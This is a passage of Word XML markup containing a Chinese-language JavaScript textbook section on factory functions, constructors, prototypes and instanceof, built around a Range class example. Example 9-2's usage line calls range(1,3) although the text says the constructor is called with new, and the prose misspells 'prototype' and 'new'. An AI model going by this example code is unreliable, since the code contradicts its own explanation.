      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>toString:function(){return"("+this.from+"..."+this.to+")";}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>这里是使用</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>范围对象</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>的一些例子</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var r=range(1,3);//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个范围对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>r.includes(2);//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:2</w:t>
      </w:r>
      <w:r>
        <w:t>在这个范围内</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>r.foreach(console.log);//</w:t>
      </w:r>
      <w:r>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:t>1 2 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(r);//</w:t>
      </w:r>
      <w:r>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:t>(1...3)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在例</w:t>
      </w:r>
      <w:r>
        <w:t>9-1</w:t>
      </w:r>
      <w:r>
        <w:t>中有一些代码是没有用的。这段代码定义了一个工厂方法</w:t>
      </w:r>
      <w:r>
        <w:t>range()</w:t>
      </w:r>
      <w:r>
        <w:t>，用来创建新的范围对象。我们注意到，这里给</w:t>
      </w:r>
      <w:r>
        <w:t>range()</w:t>
      </w:r>
      <w:r>
        <w:t>函数定义了一个属性</w:t>
      </w:r>
      <w:r>
        <w:t>range.methods</w:t>
      </w:r>
      <w:r>
        <w:t>，用以快捷地存放定义类的原型对象。把原型对象挂在函数上没什么大不了，但也不是惯用做法。再者，注意</w:t>
      </w:r>
      <w:r>
        <w:t>range()</w:t>
      </w:r>
      <w:r>
        <w:t>函数给每个范围对象都定义了</w:t>
      </w:r>
      <w:r>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t>属性，用以定义范围的起始位置和结束位置，这两个属性是非共享的，当然也是不可继承的。最后，注意在</w:t>
      </w:r>
      <w:r>
        <w:t>range.methods</w:t>
      </w:r>
      <w:r>
        <w:t>中定义的那些</w:t>
      </w:r>
      <w:r>
        <w:t>可共享、可继承的方法都用到了</w:t>
      </w:r>
      <w:r>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t>属性，而且使用了</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>关键字，为了指代它们，二者使用</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>关键字来指代调用这个方法的对象。任何类的方法都可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>的这种基本用法来读取对象的属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="225" w:name="9_2_Lei_He_Gou_Zao_Han_Shu_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>9.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　类和构造函数</w:t>
      </w:r>
      <w:bookmarkEnd w:id="225"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-1</w:t>
      </w:r>
      <w:r>
        <w:t>展示了在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中定义类的其中一种方法。但这种方法并不常用，毕竟它没有定义构造函数，构造函数是用来初始化新创建的对象的。</w:t>
      </w:r>
      <w:r>
        <w:t>8.2.3</w:t>
      </w:r>
      <w:r>
        <w:t>节已经讲到，使用关键字</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>来调用构造函数。使用</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>调用构造函数会自动创建一个新对象，因此构造函数本身只需初始化这个新对象的状态即可。调用</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数的一个重要特征是，构造函数的</w:t>
      </w:r>
      <w:r>
        <w:t>prototye</w:t>
      </w:r>
      <w:r>
        <w:t>属性被用做新对象的原型。这意味着通过同一个构造函数创建的所有对象都继承自一个相同的对象，因此它们都是同一个类的成员。例</w:t>
      </w:r>
      <w:r>
        <w:t>9-2</w:t>
      </w:r>
      <w:r>
        <w:t>对例</w:t>
      </w:r>
      <w:r>
        <w:t>9-1</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>范围类</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>做了修改，使用构造函数代替工厂函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-2</w:t>
      </w:r>
      <w:r>
        <w:t>：使用构造函数来定义</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>范围类</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//range2.js:</w:t>
      </w:r>
      <w:r>
        <w:t>表示值的范围的类的另一种实现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这是一个构造函数，用以初始化新创建的</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>范围对象</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>注意，这里并没有创建并返回一个对象，仅仅是初始化</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function Range(from,to){//</w:t>
      </w:r>
      <w:r>
        <w:t>存储</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>范围对象</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>起始位置和结束位置（状态）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这两个属性是不可继承的，每个对象都拥有唯一的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.from=from;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.to=to;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>所有的</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>范围对象</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>都继承自这个对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>注意，属性的名字必须是</w:t>
      </w:r>
      <w:r>
        <w:t>"prototype"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Range.prototype={//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>在范围内，则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这个方法可以比较数字范围，也可以比较字符串和日期范围</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>includes:function(x){return this.from</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=x</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=this.to;},//</w:t>
      </w:r>
      <w:r>
        <w:t>对于范围内的每个整</w:t>
      </w:r>
      <w:r>
        <w:t>数都调用一次</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这个方法只可用于数字范围</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>foreach:function(f){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var x=Math.ceil(this.from);x</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=this.to;x++)f(x);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},//</w:t>
      </w:r>
      <w:r>
        <w:t>返回表示这个范围的字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>toString:function(){return"("+this.from+"..."+this.to+")";}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>这里是使用</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>范围对象</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>的一些例子</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var r=range(1,3);//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个范围对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>r.includes(2);//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:2</w:t>
      </w:r>
      <w:r>
        <w:t>在这个范围内</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>r.foreach(console.log);//</w:t>
      </w:r>
      <w:r>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:t>1 2 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(r);//</w:t>
      </w:r>
      <w:r>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:t>(1...3)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将例</w:t>
      </w:r>
      <w:r>
        <w:t>9-1</w:t>
      </w:r>
      <w:r>
        <w:t>和例</w:t>
      </w:r>
      <w:r>
        <w:t>9-2</w:t>
      </w:r>
      <w:r>
        <w:t>中的代码做一个仔细的对比，可以发现两种定义类的技术的差别。首先，注意当工厂函数</w:t>
      </w:r>
      <w:r>
        <w:t>range()</w:t>
      </w:r>
      <w:r>
        <w:t>转化为构造函数时被重命名为</w:t>
      </w:r>
      <w:r>
        <w:t>Range()</w:t>
      </w:r>
      <w:r>
        <w:t>。这里遵循了一个常见的编程约定：从某种意义上讲，定义构造函数既是定义类，并且类名首字母要大写。而普通的函数和方法都是首字母小写。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>再者，注意</w:t>
      </w:r>
      <w:r>
        <w:t>Range()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数是通过</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>关键字调用的（在示例代码的末尾），而</w:t>
      </w:r>
      <w:r>
        <w:t>range()</w:t>
      </w:r>
      <w:r>
        <w:t>工厂函数则不必</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>。例</w:t>
      </w:r>
      <w:r>
        <w:t>9-1</w:t>
      </w:r>
      <w:r>
        <w:t>通过调用普通函数（见</w:t>
      </w:r>
      <w:r>
        <w:t>8.2.1</w:t>
      </w:r>
      <w:r>
        <w:t>节）来创建新对象，例</w:t>
      </w:r>
      <w:r>
        <w:t>9-2</w:t>
      </w:r>
      <w:r>
        <w:t>则使用构造函数调用（见</w:t>
      </w:r>
      <w:r>
        <w:t>8.2.3</w:t>
      </w:r>
      <w:r>
        <w:t>节）来创建新对象。由于</w:t>
      </w:r>
      <w:r>
        <w:t>Range()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数是通过</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>关键字调用的，因此不必调用</w:t>
      </w:r>
      <w:r>
        <w:t>inherit()</w:t>
      </w:r>
      <w:r>
        <w:t>或其他什么逻辑来创建新对象。在调用构造函数之前就已经创建了新对象，通过</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>关键字可以获取这个新对象。</w:t>
      </w:r>
      <w:r>
        <w:t>Range()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数只不过是初始化</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>而已。构造函数甚至不必返回这个新创建的对象，构造函数会自动创建对</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>象，然后将构造函数作为这个对象的方法来调用一次，最后返回这个新对象。事实上，构造函数的命名规</w:t>
      </w:r>
      <w:r>
        <w:t>则（首字母大写）和普通函数是如此不同还有另外一个原因，构造函数调用和普通函数调用是不尽相同的。构造函数就是用来</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>构造新对象</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的，它必须通过关键字</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>调用，如果将构造函数用做普通函数的话，往往不会正常工作。开发者可以通过命名约定来（构造函数首字母大写，普通方法首字母小写）判断是否应当在函数之前冠以关键字</w:t>
      </w:r>
      <w:r>
        <w:t>mew</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-1</w:t>
      </w:r>
      <w:r>
        <w:t>和例</w:t>
      </w:r>
      <w:r>
        <w:t>9-2</w:t>
      </w:r>
      <w:r>
        <w:t>之间还有一个非常重要的区别，就是原型对象的命名。在第一段示例代码中的原型是</w:t>
      </w:r>
      <w:r>
        <w:t>range.methods</w:t>
      </w:r>
      <w:r>
        <w:t>。这种命名方式很方便同时具有很好的语义，但又过于随意。在第二段示例代码中的原型是</w:t>
      </w:r>
      <w:r>
        <w:t>Range.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>，这是一个强制的命名。对</w:t>
      </w:r>
      <w:r>
        <w:t>Range()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数的调用会自动使用</w:t>
      </w:r>
      <w:r>
        <w:t>Range.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>作为新</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>对象的原型。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>最后，需要注意在例</w:t>
      </w:r>
      <w:r>
        <w:t>9-1</w:t>
      </w:r>
      <w:r>
        <w:t>和例</w:t>
      </w:r>
      <w:r>
        <w:t>9-2</w:t>
      </w:r>
      <w:r>
        <w:t>中两种类定义方式的相同之处，两者的范围方法定义和调用方式是完全一样的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="226" w:name="9_2_1_Gou_Zao_Han_Shu_He_Lei_De_Biao_Shi"/>
      <w:r>
        <w:t>9.2.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　构造函数和类的标识</w:t>
      </w:r>
      <w:bookmarkEnd w:id="226"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>上文提到，原型对象是类的唯一标识：当且仅当两个对象继承自同一个原型对象时，它们才是属于同一个类的实例。而初始化对象的状态的构造函数则不能作为类的标识，两个构造函数的</w:t>
      </w:r>
      <w:r>
        <w:t>protot</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ype</w:t>
      </w:r>
      <w:r>
        <w:t>属性可能指向同一个原型对象。那么这两个构</w:t>
      </w:r>
      <w:r>
        <w:t>造函数创建的实例是属于同一个类的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>尽管构造函数不像原型那样基础，但构造函数是类的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>外在表现</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。很明显的，构造函数的名字通常用做类名。比如，我们说</w:t>
      </w:r>
      <w:r>
        <w:t>Range()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数创建</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>对象。然而，更根本地讲，当使用</w:t>
      </w:r>
      <w:r>
        <w:t>instanceof</w:t>
      </w:r>
      <w:r>
        <w:t>运算符来检测对象是否属于某个类时会用到构造函数。假设这里有一个对象</w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>，我们想知道</w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>是否是</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>对象，我们这样写：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>r instanceof Range//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>继承自</w:t>
      </w:r>
      <w:r>
        <w:t>Range.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>，则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>实际上</w:t>
      </w:r>
      <w:r>
        <w:t>instanceof</w:t>
      </w:r>
      <w:r>
        <w:t>运算符并不会检查</w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>是否是由</w:t>
      </w:r>
      <w:r>
        <w:t>Ran</w:t>
      </w:r>
      <w:r>
        <w:t>ge()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数初始化而来，而会检查</w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>是否继承自</w:t>
      </w:r>
      <w:r>
        <w:t>Range.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>。不过，</w:t>
      </w:r>
      <w:r>
        <w:t>instanceof</w:t>
      </w:r>
      <w:r>
        <w:t>的语法则强化了</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数是类的公有标识</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的概念。在本章的后面还会碰到对</w:t>
      </w:r>
      <w:r>
        <w:t>instanceof</w:t>
      </w:r>
      <w:r>
        <w:t>运算符的介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="227" w:name="9_2_2_constructorShu_Xing_"/>
      <w:r>
        <w:t>9.2.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="227"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在例</w:t>
      </w:r>
      <w:r>
        <w:t>9-2</w:t>
      </w:r>
      <w:r>
        <w:t>中，将</w:t>
      </w:r>
      <w:r>
        <w:t>Range.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>定义为一个新对象，这个对象包含类所需要的方法。其实没有必要新创建一个对象，用单个对象直接量的属性就可以方便地定义原型上的方法。任何</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>函</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>数都可以用做构造函数，并且调用构造函数是需要用到一个</w:t>
      </w:r>
      <w:r>
        <w:t>proto</w:t>
      </w:r>
      <w:r>
        <w:t>tye</w:t>
      </w:r>
      <w:r>
        <w:t>属性的。因此，每个</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>函数（</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>Function.bind()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回的函数除外）都自动拥有一个</w:t>
      </w:r>
      <w:r>
        <w:t>prototype</w:t>
      </w:r>
      <w:r>
        <w:t>属性。这个属性的值是一个对象，这个对象包含唯一一个不可枚举属性</w:t>
      </w:r>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值是一个函数对象：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
